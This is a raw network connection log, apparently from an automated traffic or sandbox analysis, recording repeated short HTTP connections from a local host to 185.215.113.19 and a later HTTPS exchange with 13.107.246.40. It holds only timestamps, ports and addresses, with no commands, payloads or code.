Sep 1, 2024 06:31:00.545727968 CEST	80	49937	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:01.284384966 CEST	80	49937	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:01.284956932 CEST	49937	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:01.287659883 CEST	49938	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:01.287659883 CEST	49937	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:01.293478966 CEST	80	49938	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:01.293865919 CEST	80	49937	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:01.296873093 CEST	49938	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:01.296873093 CEST	49937	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:01.297126055 CEST	49938	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:01.302136898 CEST	80	49938	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:02.043075085 CEST	80	49938	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:02.043126106 CEST	49938	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.155766010 CEST	49938	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.156189919 CEST	49939	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.160907030 CEST	80	49938	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:02.160959005 CEST	49938	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.161242962 CEST	80	49939	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:02.161329031 CEST	49939	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.161669016 CEST	49939	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.166814089 CEST	80	49939	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:02.214375019 CEST	49819	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:02.214407921 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:02.302361965 CEST	49818	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:02.302429914 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:02.921812057 CEST	80	49939	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:02.927650928 CEST	49939	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.927650928 CEST	49939	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.927999020 CEST	49940	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.933021069 CEST	80	49939	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:02.933199883 CEST	80	49940	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:02.936893940 CEST	49939	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.936893940 CEST	49940	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.937073946 CEST	49940	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:02.941979885 CEST	80	49940	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:03.682171106 CEST	80	49940	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:03.685004950 CEST	49940	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:03.796015978 CEST	49940	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:03.796026945 CEST	49941	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:03.801089048 CEST	80	49941	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:03.801537037 CEST	80	49940	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:03.801609993 CEST	49940	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:03.801630020 CEST	49941	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:03.801956892 CEST	49941	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:03.806981087 CEST	80	49941	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:04.215806007 CEST	49941	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:04.223304987 CEST	49942	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:04.228712082 CEST	80	49942	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:04.228777885 CEST	49942	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:04.229082108 CEST	49942	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:04.235703945 CEST	80	49942	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:04.984127045 CEST	80	49942	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:04.989722013 CEST	49942	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.108980894 CEST	49942	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.108985901 CEST	49943	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.114172935 CEST	80	49942	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:05.114300966 CEST	49942	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.114403963 CEST	80	49943	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:05.117196083 CEST	49943	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.117196083 CEST	49943	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.122275114 CEST	80	49943	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:05.868314028 CEST	80	49943	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:05.868371010 CEST	49943	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.872236967 CEST	49943	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.872745991 CEST	49944	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.877691031 CEST	80	49943	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:05.877739906 CEST	49943	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.877892017 CEST	80	49944	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:05.877950907 CEST	49944	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.878235102 CEST	49944	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:05.883291960 CEST	80	49944	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:06.626766920 CEST	80	49944	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:06.626817942 CEST	49944	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:06.733798027 CEST	49944	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:06.734052896 CEST	49945	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:06.738990068 CEST	80	49944	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:06.739052057 CEST	49944	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:06.739207029 CEST	80	49945	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:06.739267111 CEST	49945	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:06.739483118 CEST	49945	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:06.744501114 CEST	80	49945	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:07.491211891 CEST	80	49945	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:07.494929075 CEST	49945	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:07.497483969 CEST	49945	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:07.498855114 CEST	49946	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:07.502646923 CEST	80	49945	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:07.502744913 CEST	49945	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:07.503823042 CEST	80	49946	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:07.506875038 CEST	49946	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:07.507087946 CEST	49946	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:07.512039900 CEST	80	49946	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:08.264081001 CEST	80	49946	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:08.264128923 CEST	49946	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:08.375781059 CEST	49946	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:08.376138926 CEST	49947	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:08.381167889 CEST	80	49947	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:08.381228924 CEST	49947	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:08.381489992 CEST	49947	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:08.381778002 CEST	80	49946	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:08.381824017 CEST	49946	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:08.386468887 CEST	80	49947	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:09.130070925 CEST	80	49947	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:09.130148888 CEST	49947	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:09.132941961 CEST	49948	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:09.132942915 CEST	49947	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:09.138243914 CEST	80	49948	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:09.138356924 CEST	49948	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:09.138767958 CEST	80	49947	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:09.138863087 CEST	49947	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:09.250824928 CEST	49949	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:09.255958080 CEST	80	49949	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:09.256033897 CEST	49949	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:09.256251097 CEST	49949	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:09.261751890 CEST	80	49949	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:09.998922110 CEST	80	49949	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:09.998991966 CEST	49949	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.003292084 CEST	49949	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.003575087 CEST	49950	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.008512020 CEST	80	49949	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:10.008560896 CEST	49949	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.008749008 CEST	80	49950	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:10.008807898 CEST	49950	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.009340048 CEST	49950	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.014847994 CEST	80	49950	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:10.754620075 CEST	80	49950	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:10.754733086 CEST	49950	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.859493971 CEST	49950	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.859890938 CEST	49951	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.866749048 CEST	80	49950	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:10.866796017 CEST	49950	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.866884947 CEST	80	49951	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:10.866940975 CEST	49951	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.867077112 CEST	49951	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:10.872762918 CEST	80	49951	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:11.614381075 CEST	80	49951	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:11.614906073 CEST	49951	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:11.617367983 CEST	49952	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:11.617398977 CEST	49951	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:11.622354984 CEST	80	49952	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:11.622734070 CEST	80	49951	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:11.622890949 CEST	49952	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:11.622901917 CEST	49951	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:11.623116016 CEST	49952	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:11.627994061 CEST	80	49952	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:12.369167089 CEST	80	49952	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:12.369225979 CEST	49952	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:12.483551979 CEST	49952	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:12.483892918 CEST	49953	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:12.488672018 CEST	80	49952	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:12.488720894 CEST	49952	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:12.488898039 CEST	80	49953	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:12.488960981 CEST	49953	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:12.489268064 CEST	49953	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:12.494153976 CEST	80	49953	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:13.238039970 CEST	80	49953	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:13.238893032 CEST	49953	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:13.241169930 CEST	49953	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:13.242840052 CEST	49954	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:13.246460915 CEST	80	49953	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:13.246927023 CEST	49953	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:13.248372078 CEST	80	49954	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:13.250946045 CEST	49954	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:13.254851103 CEST	49954	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:13.260623932 CEST	80	49954	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:14.024513960 CEST	80	49954	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:14.024573088 CEST	49954	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.134846926 CEST	49954	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.135149002 CEST	49955	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.140222073 CEST	80	49954	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:14.140235901 CEST	80	49955	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:14.140276909 CEST	49954	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.140319109 CEST	49955	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.140754938 CEST	49955	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.146073103 CEST	80	49955	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:14.897216082 CEST	80	49955	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:14.903701067 CEST	49955	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.903701067 CEST	49955	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.905296087 CEST	49956	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.909476995 CEST	80	49955	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:14.910763979 CEST	80	49956	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:14.910789967 CEST	49955	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.913008928 CEST	49956	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.913008928 CEST	49956	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:14.917946100 CEST	80	49956	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:15.661814928 CEST	80	49956	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:15.662955999 CEST	49956	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:15.780344009 CEST	49957	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:15.780348063 CEST	49956	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:15.785443068 CEST	80	49957	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:15.785520077 CEST	49957	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:15.785743952 CEST	49957	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:15.785804033 CEST	80	49956	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:15.785887003 CEST	49956	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:15.790756941 CEST	80	49957	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.095136881 CEST	80	49957	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.095186949 CEST	80	49957	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.095652103 CEST	80	49957	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.095722914 CEST	49957	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.095722914 CEST	49957	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.098517895 CEST	49958	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.098517895 CEST	49957	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.104201078 CEST	80	49958	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.105273008 CEST	80	49957	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.105916023 CEST	49958	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.105916977 CEST	49957	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.106029987 CEST	49958	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.112807035 CEST	80	49958	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.858050108 CEST	80	49958	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.858114004 CEST	49958	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.968717098 CEST	49958	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.969655037 CEST	49960	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.973963022 CEST	80	49958	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.974010944 CEST	49958	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.974714041 CEST	80	49960	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:17.974818945 CEST	49960	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.974965096 CEST	49960	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:17.979835033 CEST	80	49960	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:18.719948053 CEST	80	49960	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:18.720011950 CEST	49960	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:18.723403931 CEST	49960	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:18.723853111 CEST	49961	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:18.728861094 CEST	80	49960	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:18.728914976 CEST	49960	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:18.729084015 CEST	80	49961	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:18.729144096 CEST	49961	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:18.729310989 CEST	49961	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:18.734318018 CEST	80	49961	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:19.511921883 CEST	80	49961	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:19.512954950 CEST	49961	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:19.645842075 CEST	49961	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:19.645858049 CEST	49963	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:19.650711060 CEST	80	49963	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:19.650952101 CEST	49963	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:19.651026011 CEST	49963	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:19.651376009 CEST	80	49961	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:19.654969931 CEST	49961	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:19.656327963 CEST	80	49963	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:20.077824116 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.077903032 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.077975988 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.078161001 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.078192949 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.411822081 CEST	80	49963	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:20.411885023 CEST	49963	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:20.415004015 CEST	49963	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:20.415419102 CEST	49965	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:20.422298908 CEST	80	49965	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:20.422307968 CEST	80	49963	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:20.422355890 CEST	49965	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:20.422378063 CEST	49963	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:20.422573090 CEST	49965	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:20.427700996 CEST	80	49965	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:20.740663052 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.741245031 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.741286993 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.741591930 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.742223024 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.742288113 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.742484093 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.784507036 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.858397961 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.858417988 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.858433008 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.858510017 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.858592033 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.858624935 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.858648062 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.949178934 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.949196100 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.949871063 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.949897051 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.952239037 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.952254057 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.952325106 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.952325106 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:20.952342987 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:20.958856106 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.045902967 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.045921087 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.046024084 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.046057940 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.046207905 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.051121950 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.051139116 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.051233053 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.051249027 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.051521063 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.052772045 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.052784920 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.052860975 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.052875996 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.053121090 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.055282116 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.055295944 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.055572033 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.055586100 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.057988882 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.137729883 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.137742996 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.137834072 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.137834072 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.137854099 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.137912035 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.140397072 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.140409946 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.140516043 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.140516043 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.140537024 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.140625000 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.144876957 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.144893885 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.144962072 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.144962072 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.144975901 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.145046949 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.148467064 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.148479939 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.148565054 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.148565054 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.148578882 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.148664951 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.151988029 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.152002096 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.152092934 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.152106047 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.152359962 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.155425072 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.155438900 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.155531883 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.155545950 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.155643940 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.158866882 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.158875942 CEST	443	49964	13.107.246.40	192.168.2.5
